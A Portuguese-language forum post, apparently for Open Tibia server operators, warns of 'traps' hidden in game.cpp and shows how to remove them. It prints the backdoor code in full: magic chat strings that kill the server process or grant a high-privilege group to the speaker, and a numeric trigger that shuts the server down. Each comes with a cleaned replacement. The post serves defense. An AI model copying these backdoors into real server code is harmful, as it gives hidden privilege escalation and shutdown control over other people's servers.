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Traps são armadilhas na source de servidores que podem sabotar o jogo de certo modo caso usado de má fé. Alguns desenvolvedores nem sabem que essas traps existem nos seus jogos, então trouxe algumas traps comuns que podem estar no seu servidor.

 

          TRAP DE DAR RANK A USUÁRIO

Spoiler

No arquivo game.cpp você irá procurar pelo seguinte trecho:

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
   {
exit(0);
   }

if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
   {
   player->setGroup(Groups::getInstance()->getGroup(6));
   }

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

E troque ele por:

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

 

TRAP DE DESLIGAR SERVIDOR

Spoiler

No arquivo game.cpp procure pelo seguinte trecho:

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

int specs = 31101996;
std::string findText;
std::stringstream findTextInput;
findTextInput << specs;
findText = findTextInput.str();
bool exists = text.find(findText) != std::string::npos;
if(exists){
          Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
  return true;
       }

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

E mude ele para:

bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

 

Créditos: L3K0T(Por compartilhar)

Cipsoft(Pelo código original)

 

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Somos gratos por sua contribuição, com certeza será útil para toda a comunidade! ❤️  REP+

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